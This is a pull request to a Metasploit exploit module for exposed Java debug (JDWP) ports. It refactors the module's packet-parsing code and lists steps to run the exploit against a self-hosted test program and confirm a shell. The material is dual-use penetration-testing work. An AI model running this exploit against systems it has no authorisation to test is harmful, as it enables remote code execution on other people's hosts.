### PR TITLE
removing slice operators from jdwp_debugger

### DIFF
--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -175,24 +175,18 @@ class MetasploitModule < Msf::Exploit::Remote
     if pkt_len < 4
       fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
     end
-    pkt_len = pkt_len - 4
-
-    response = sock.get_once(pkt_len, timeout)
-    fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response
-    while response.length < pkt_len
-      partial = sock.get_once(pkt_len, timeout)
-      fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
-      response << partial
-    end
-
-    fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length == pkt_len
-
-    id, flags, err_code = response.unpack('NCn')
-    response.slice!(0..6)
+    id, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
     if err_code != 0 && flags == REPLY_PACKET_TYPE
       fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
     end
 
+    response = ""
+    while response.length + 11 < pkt_len
+      partial = sock.get_once(pkt_len, timeout)
+      fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
+      response << partial
+    end
+    fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length + 11 == pkt_len
     response
   end
 
@@ -207,8 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Unpacks received string structure from the server response into a normal string
   def read_string(data)
     data_len = data.unpack('N')[0]
-    data.slice!(0..3)
-    return data.slice!(0,data_len)
+    return data[4,data_len]
   end
 
   # Creates a new string object in the target VM and returns its id
@@ -252,10 +245,11 @@ class MetasploitModule < Msf::Exploit::Remote
   # Parses given data according to a set of formats
   def parse_entries(buf, formats, explicit=true)
     entries = []
+    index = 0
 
     if explicit
       nb_entries = buf.unpack('N')[0]
-      buf.slice!(0..3)
+      buf = buf[4..-1]
     else
       nb_entries = 1
     end
@@ -270,25 +264,25 @@ class MetasploitModule < Msf::Exploit::Remote
 
       formats.each do |fmt,name|
         if fmt == "L" || fmt == 8
-          data[name] = buf.unpack('Q>')[0]
-          buf.slice!(0..7)
+          data[name] = buf[index, 8].unpack('Q>')[0]
+          index += 8
         elsif fmt == "I" || fmt == 4
-          data[name] = buf.unpack('N')[0]
-          buf.slice!(0..3)
+          data[name] = buf[index, 4].unpack('N')[0]
+          index += 4
         elsif fmt == "S"
-          data_len = buf.unpack('N')[0]
-          buf.slice!(0..3)
-          data[name] = buf.slice!(0,data_len)
+          data_len = buf[index, 4].unpack('N')[0]
+          data[name] = buf[index + 4, data_len]
+          index += 4 + data_len
         elsif fmt == "C"
-          data[name] = buf.unpack('C')[0]
-          buf.slice!(0)
+          data[name] = buf[index].unpack('C')[0]
+          index += 1
         elsif fmt == "Z"
-          t = buf.unpack('C')[0]
-          buf.slice!(0)
+          t = buf[index].unpack('C')[0]
           if t == 115
-            data[name] = solve_string(buf.slice!(0..7))
+            data[name] = solve_string(buf[index + 1, 8])
+            index += 9
           elsif t == 73
-            data[name], buf = buf.unpack('NN')
+            data[name], buf = buf[index +1, 4].unpack('NN')
           end
         else
           fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response")
@@ -340,13 +334,13 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.put(create_packet(ALLTHREADS_SIG))
     response = read_reply
     num_threads = response.unpack('N').first
-    response.slice!(0..3)
+    index = 4
 
     size = @vars["objectid_size"]
     num_threads.times do
-      t_id = unformat(size, response[0..size-1])
+      t_id = unformat(size, response[index, size])
       @threads[t_id] = nil
-      response.slice!(0..size-1)
+      index += size
     end
   end
 
@@ -429,10 +423,8 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "Bad response when getting value for field")
     end
 
-    response.slice!(0..4)
-
     len = @vars["objectid_size"]
-    value = unformat(len, response)
+    value = unformat(len, response[5..-1])
 
     value
   end


### PR DESCRIPTION
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [x] Start jdwp on test instance 
```
cat > HelloWorld.java <<'EOF'
public class HelloWorld {
    public static void main(String[] args) {
        while (1==1) {
            try {
                Thread.sleep(1000);
                System.out.println("hello");
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
}
EOF
javac HelloWorld.java
java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000 -cp . HelloWorld
```
- [x] Start `msfconsole`
- [x] `use exploit/multi/misc/java_jdwp_debugger`
- [x] `set rhost this.is.my.ip`
- [x] `exploit`
- [x] **Verify** shell!
- [x] **Document** This removes the slice! operator from the exploit - with the slice operator, it modifies the buffer every single time which could take extensive amounts of time vs just grabbing content from the string as it does now (following more closely to https://github.com/IOActive/jdwp-shellifier/blob/master/jdwp-shellifier.py)